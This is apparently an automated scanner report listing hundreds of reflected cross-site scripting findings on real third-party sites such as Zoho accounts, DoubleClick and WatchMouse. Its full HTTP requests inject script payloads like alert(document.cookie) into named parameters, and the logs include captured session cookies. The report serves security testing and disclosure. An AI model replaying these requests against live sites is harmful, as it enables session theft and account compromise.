1.707. http://www.watchmouse.com/pl/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.708. http://www.watchmouse.com/profile.php [REST URL parameter 1]

1.709. http://www.watchmouse.com/profile.php [name of an arbitrarily supplied request parameter]

1.710. http://www.watchmouse.com/pt/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.711. http://www.watchmouse.com/pt/ [REST URL parameter 1]

1.712. http://www.watchmouse.com/pt/ [name of an arbitrarily supplied request parameter]

1.713. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 1]

1.714. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 2]

1.715. http://www.watchmouse.com/pt/feature/public-status-page.html [REST URL parameter 3]

1.716. http://www.watchmouse.com/pt/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

1.717. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 1]

1.718. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 2]

1.719. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [REST URL parameter 3]

1.720. http://www.watchmouse.com/pt/feature/the-watchmouse-api.html [name of an arbitrarily supplied request parameter]

1.721. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.722. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.723. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.724. http://www.watchmouse.com/pt/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.725. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 1]

1.726. http://www.watchmouse.com/pt/learn_more.php [REST URL parameter 2]

1.727. http://www.watchmouse.com/pt/learn_more.php [name of an arbitrarily supplied request parameter]

1.728. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 1]

1.729. http://www.watchmouse.com/pt/plans_price.php [REST URL parameter 2]

1.730. http://www.watchmouse.com/pt/plans_price.php [name of an arbitrarily supplied request parameter]

1.731. http://www.watchmouse.com/pt/register.php [REST URL parameter 1]

1.732. http://www.watchmouse.com/pt/register.php [REST URL parameter 2]

1.733. http://www.watchmouse.com/pt/register.php [name of an arbitrarily supplied request parameter]

1.734. http://www.watchmouse.com/pt/website_monitoring_features.php [REST URL parameter 1]

1.735. http://www.watchmouse.com/pt/website_monitoring_features.php [REST URL parameter 2]

1.736. http://www.watchmouse.com/pt/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.737. http://www.watchmouse.com/pubstatus.php [REST URL parameter 1]

1.738. http://www.watchmouse.com/pubstatus.php [name of an arbitrarily supplied request parameter]

1.739. http://www.watchmouse.com/settings.php [REST URL parameter 1]

1.740. http://www.watchmouse.com/settings.php [name of an arbitrarily supplied request parameter]

1.741. http://www.watchmouse.com/sv/ [3d071%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E03249d204b0 parameter]

1.742. http://www.watchmouse.com/sv/ [REST URL parameter 1]

1.743. http://www.watchmouse.com/sv/ [name of an arbitrarily supplied request parameter]

1.744. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 1]

1.745. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 2]

1.746. http://www.watchmouse.com/sv/feature/public-status-page.html [REST URL parameter 3]

1.747. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 1]

1.748. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 2]

1.749. http://www.watchmouse.com/sv/feature/the-watchmouse-api.html [REST URL parameter 3]

1.750. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 1]

1.751. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 2]

1.752. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [REST URL parameter 3]

1.753. http://www.watchmouse.com/sv/feature/transaction-monitoring-web-application-testing.html [name of an arbitrarily supplied request parameter]

1.754. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 1]

1.755. http://www.watchmouse.com/sv/learn_more.php [REST URL parameter 2]

1.756. http://www.watchmouse.com/sv/learn_more.php [name of an arbitrarily supplied request parameter]

1.757. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 1]

1.758. http://www.watchmouse.com/sv/plans_price.php [REST URL parameter 2]

1.759. http://www.watchmouse.com/sv/plans_price.php [name of an arbitrarily supplied request parameter]

1.760. http://www.watchmouse.com/sv/register.php [REST URL parameter 1]

1.761. http://www.watchmouse.com/sv/register.php [REST URL parameter 2]

1.762. http://www.watchmouse.com/sv/register.php [name of an arbitrarily supplied request parameter]

1.763. http://www.watchmouse.com/sv/website_monitoring_features.php [REST URL parameter 1]

1.764. http://www.watchmouse.com/sv/website_monitoring_features.php [REST URL parameter 2]

1.765. http://www.watchmouse.com/sv/website_monitoring_features.php [name of an arbitrarily supplied request parameter]

1.766. http://www.watchmouse.com/trial.php [REST URL parameter 1]

1.767. http://www.watchmouse.com/trial.php [name of an arbitrarily supplied request parameter]

1.768. http://www.watchmouse.com/w3c/p3p.xml [REST URL parameter 1]

1.769. http://www.watchmouse.com/worldwide.php [REST URL parameter 1]

1.770. http://www.watchmouse.com/worldwide.php [name of an arbitrarily supplied request parameter]

1.771. http://xhtml.co.il/he/page-700/jQuery [72f1f'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb977444cfbf parameter]

1.772. http://xhtml.co.il/he/page-700/jQuery [name of an arbitrarily supplied request parameter]

1.773. http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82 [name of an arbitrarily supplied request parameter]

1.774. http://xhtml.co.il/ru/jQuery/%D0%9F%D0%BE%D0%B6%D0%B5%D1%80%D1%82%D0%B2%D0%BE%D0%B2%D0%B0%D1%82%D1%8C-%D0%BD%D0%B0-%D0%BF%D1%80%D0%BE%D0%B5%D0%BA%D1%82 [name of an arbitrarily supplied request parameter]

1.775. http://xhtml.co.il/ru/page-1013/jQuery.browser [2baaa'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E50c1d38299f parameter]

1.776. http://xhtml.co.il/ru/page-1013/jQuery.browser [name of an arbitrarily supplied request parameter]

1.777. http://coderseye.com/2007/semitransparent-rollovers-made-easy-with-jquery.html [Referer HTTP header]

1.778. http://ib.adnxs.com/ttj [Referer HTTP header]

1.779. https://secure.watchmouse.com/en/ [Referer HTTP header]

1.780. https://secure.watchmouse.com/en/index.php [Referer HTTP header]

1.781. https://secure.watchmouse.com/en/learn_more.php [Referer HTTP header]

1.782. https://secure.watchmouse.com/en/plans_price.php [Referer HTTP header]

1.783. https://secure.watchmouse.com/en/website_monitoring_features.php [Referer HTTP header]

1.784. https://accounts.zoho.com/login [iamcsr cookie]

1.785. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.786. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.787. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.788. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

1.789. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.790. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.791. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.792. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]
1. Cross-site scripting (reflected)
There are 792 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: strict validation of input on arrival, and HTML-encoding of user data at every point where it is copied into a response.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.rfihub.com/sed [pa parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.rfihub.com
Path:   /sed

Issue detail

The value of the pa request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 19cb2'><script>alert(1)</script>9b01dc2c9cc was submitted in the pa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre259932283447419cb2'><script>alert(1)</script>9b01dc2c9cc&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1 HTTP/1.1
Host: a.rfihub.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a1=1CAESEDwKxKPrWufjyLofYqzf4_4; t=1296740537347; a=c369013694478760033; o=1-BjMxrfcI6jt9; r=1296740536014; b="aAJ2iVhfw==AD809AAABLgBphCs=AD825AAABLgBphCs=AD736AAABLgBphCs=AD829AAABLgBphCs=AD748AAABLgBphCs=AD801AAABLgBphCs=AD773AAABLgBphCs=AD805AAABLgBphCs=AD747AAABLgBphCs="; m="aADZqFZGg==AI20472726AAABLgBphCw=AI20472701AAABLffM4Y0=AI20472701AAABLevCTs8="; g="aAD7LeeHw==A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8="; c="aAYKNo-Sw==AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGt11341AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw="; f="aADZiQHPw==AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4="; k="aAJBlvOUA==AGnmc809AN1288024309000AAABLgCILYI=AGnmc801AN1288021692000AAABLgCILYI=AGnmc829AN1288026445000AAABLgCILYI=AGnmc736AN1288018708000AAABLgCILYI=AGnmc805AN1288021876000AAABLgCILYI=AGnmc825AN1288026116000AAABLgCILYI=AGnmc773AN1288019600000AAABLgCILYI=AGnmc747AN1288024980000AAABLgCILYI=AGnmc748AN1288024901000AAABLgCILYI="; s="aAEOLfHoQ==AE9479AN1294103956000AAABLgCILYI=AE9438AN1273618082000AAABLgBpdhw=AF12446AN1285279980000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw="; e=cb

Response

HTTP/1.1 200 OK
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Content-Type: text/html; charset=iso-8859-1
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: g="aAElhzkBQ==A_a2pwDXuoO-PeR|15705|73433|68086|14121|1243|92574|445|32521|7792AAABLgq3o_o=A_a9RXWgJTWnNNS|14969|69553|60848|13007|1144|90136|306|32226|7317AAABLgCILYY=A_aFWCVjo6agoYc|16569|76934|70571|14534|1277|92574|445|32490|7755AAABLgBpfaE=A9aTqK7H67WacJ_|9542|45408|51494|13737|830|92405|445|29513|7557AAABLgBpdh8=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: c="aAfAlZ4YQ==AFd1243AB1AAABLgq3o_Y=AFv2946AB1AAABLgq3o_Y=AGu14941AB1AAABLgq3o_Y=AFc1243AB1AAABLgq3o_Y=AFl2946AB1AAABLgq3o_Y=AGt14941AB1AAABLgq3o_Y=AGb15705AB1AAABLgq3o_Y=AGa15705AB1AAABLgq3o_Y=AFd1144AB1AAABLgCILYI=AFv2383AB1AAABLgCILYI=AGu11341AB1AAABLgCILYI=AFc1144AB1AAABLgCILYI=AFl2383AB1AAABLgCILYI=AGb14969AB1AAABLgCILYI=AGa14969AB1AAABLgCILYI=AFd1277AB1AAABLgBpfZ4=AFv3000AB1AAABLgBpfZ4=AGu15506AB1AAABLgBpfZ4=AFc1277AB1AAABLgBpfZ4=AFl3000AB1AAABLgBpfZ4=AGt15506AB1AAABLgBpfZ4=AGb16569AB1AAABLgBpfZ4=AGa16569AB1AAABLgBpfZ4=AEd830AB1AAABLgBpdhw=AFv1265AB1AAABLgBpdhw=AFu5385AB1AAABLgBpdhw=AEc830AB1AAABLgBpdhw=AFl1265AB1AAABLgBpdhw=AFt5385AB1AAABLgBpdhw=AFb9542AB1AAABLgBpdhw=AFa9542AB1AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: f="aAE82cUpg==AK1297259930AB1AAABLgq3o_Y=AK1297087034AB4AAABLgCILYI=AK1296942555AB1AAABLffM4Y0=AK1296740536AB1AAABLevCTs4=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: s="aAE-DNNhg==AE9479AN1294103956000AAABLgq3o_Y=AF12446AN1285279980000AAABLgq3o_Y=AE9438AN1273618082000AAABLgBpdhw=AE8438AN1275963655000AAABLgBpdhw=";Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Set-Cookie: e=cb;Path=/;Domain=.rfihub.com;Expires=Fri, 10-Aug-12 13:58:50 GMT
Content-Length: 2495

<html><body><span id="__rfi" style="height:0px; width:0px"><IFRAME SRC="http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259930614;click=http://a.rfihub.com/aci
...[SNIP]...
border=0 width=0 height=0 src='http://a.rfihub.com/tk.gif?rb=445&re=19969&aa=15705,73433,14121,68086,1243,14941,2pwDXuoO-PeR,http%3A%2F%2Frocketfuelinc.com,776,2946,32521,1879,7792&pa=ppre259932283447419cb2'><script>alert(1)</script>9b01dc2c9cc&id=&ra=2599306180.2252382552959169'>
...[SNIP]...

1.2. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ed7ba'><a%20b%3dc>0cf1f1b2316 was submitted in the serviceurl parameter. This input was echoed as ed7ba'><a b=c>0cf1f1b2316 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /login?service_language=en&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.comed7ba'><a%20b%3dc>0cf1f1b2316 HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=a0ec328f-8bec-4c46-a791-8964eb816737; Path=/
Set-Cookie: JSESSIONID=CB4051B3AB16743E7C94E52DB96587FE; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:26:59 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
<input name="serviceurl" value='http://forum.jquery.comed7ba'><a b=c>0cf1f1b2316' type="hidden">
...[SNIP]...

1.3. https://accounts.zoho.com/login [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /login

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac40'%3b70efc06911b was submitted in the serviceurl parameter. This input was echoed as 3ac40';70efc06911b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /login?service_language=en&hide_signup=true&servicename=ZohoDiscussions&serviceurl=http://forum.jquery.com3ac40'%3b70efc06911b HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=77dab029-8f0e-499c-8d04-0838b882f244; Path=/
Set-Cookie: JSESSIONID=2A2C97CEE6A9253EB52A572CA0CFC694; Path=/; Secure
P3P: CP="CAO PSA OUR"
Set-Cookie: IAMAGENTTICKET=; Domain=.zoho.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:03 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
<title>Zoho Accounts</title>
<style type="text
...[SNIP]...
://")==0){iurl=iurl.replace("http://", "https://");window.location.href=iurl;}
}


var enableReload = true;
var serviceurl = 'http://forum.jquery.com3ac40';70efc06911b';
var servicename ='ZohoDiscussions';
var domain_label='null';
var domain_suffix='null';
var partner_domain='null';
var hidesecure = 'null';
...[SNIP]...

1.4. https://accounts.zoho.com/register [css parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the css request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bca76"><a%20b%3dc>2982c3121fe was submitted in the css parameter. This input was echoed as bca76"><a b=c>2982c3121fe in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.cssbca76"><a%20b%3dc>2982c3121fe HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=c5977962-a28d-4995-a591-f519e883d6a5; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258030432; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=801D3E9A0899D0D113269D9B7DA9CD76; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:09 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<link href="http://discussions.zoho.com/styles/iamregister.cssbca76"><a b=c>2982c3121fe" type="text/css" rel="stylesheet" />
...[SNIP]...

1.5. https://accounts.zoho.com/register [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the serviceurl request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e39'%3b8e066d4099 was submitted in the serviceurl parameter. This input was echoed as a0e39';8e066d4099 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003a0e39'%3b8e066d4099&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=d1ac3184-af9a-4c9a-b6f3-0bcde1493894; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258025823; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=AAA8FA9883A6924EB93D1CBD72502D9A; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:04 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
var validChars = /^[A-Za-z0-9_\.]+$/;
var onlyNumbers = /^[0-9]+$/
var serviceurl = 'http://discussions.zoho.com/forumHome.do?forumGroupURL=jquery&referrer=signUp&forumGroupId=14737000000003003a0e39';8e066d4099';
var servicename ='ZohoDiscussions';
var partner_domain = 'null';
var blockedEmailDomain = '@zoho.com';
var csrfParam = 'iamcsrcoo=d1ac3184-af9a-4c9a-b6f3-0bcde1493894';

function de(
...[SNIP]...

1.6. https://accounts.zoho.com/register [serviceurl parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://accounts.zoho.com
Path:   /register

Issue detail

The value of the serviceurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a8b37'><a%20b%3dc>27f14c732a9 was submitted in the serviceurl parameter. This input was echoed as a8b37'><a b=c>27f14c732a9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /register?service_language=en&servicename=ZohoDiscussions&serviceurl=http%3A%2F%2Fdiscussions.zoho.com%2FforumHome.do%3FforumGroupURL%3Djquery%26referrer%3DsignUp%26forumGroupId%3D14737000000003003a8b37'><a%20b%3dc>27f14c732a9&showheader=false&showGoogleYahoo=false&css=http://discussions.zoho.com/styles/iamregister.css HTTP/1.1
Host: accounts.zoho.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: iamcsr=990090bc-9688-4b39-b67b-38ae0c2f2279; Path=/
P3P: CP="CAO PSA OUR"
Set-Cookie: rtk=1297258021715; Domain=.zoho.com; Path=/
Set-Cookie: JSESSIONID=485D2FB98BA6B08CBC3552D5F7C106A2; Path=/; Secure
Content-Type: text/html;charset=UTF-8
Date: Wed, 09 Feb 2011 13:27:01 GMT
Connection: close
Server: ZWS


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1.dtd">


<html>
<head>
   <title>Create New Account</title>
<script type="text
...[SNIP]...
<input name="serviceurl" value='http://discussions.zoho.com/forumHome.do?forumGroupURL=jquery&referrer=signUp&forumGroupId=14737000000003003a8b37'><a b=c>27f14c732a9' type="hidden">
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3740.270604.B3/B5123509.61 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3740.270604.B3/B5123509.61

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47f95"-alert(1)-"7b5fb722fd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3740.270604.B3/B5123509.61;sz=728x90;pc=[TPAS_ID];ord=1297259897490;click=http://a.rfihub.com/aci/124_0_YWE9MTU3MDUsNzM0MzMsMTQxMjEsNjgwODYsMTI0MywxNDk0MSx0RE1pYldadEtCXzEscCw3NzYsMjk0NiwzMjUyMSwxODc5LDc3OTImcmI9NDQ1JnJlPTE5OTY5&47f95"-alert(1)-"7b5fb722fd8=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://a.rfihub.com/sed?w=728&h=90&re=19969&pv=0&ra=2599322840.14364759088493884&rb=445&ca=&rc=10.1&rd=&ua=&ub=&uc=&ud=&ue=&pa=ppre2599322834474&pb=&pc=&pd=&pg=&ct=1297259932284&pe=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1&pf=http%3A%2F%2Fblog.csdn.net%2Fjiji262%2Farchive%2F2007%2F07%2F28%2F1713771.aspx%3F3541f'style%253d'x%253aexpression(alert(1))'7b381ee316b%3D1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 09 Feb 2011 13:59:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6103

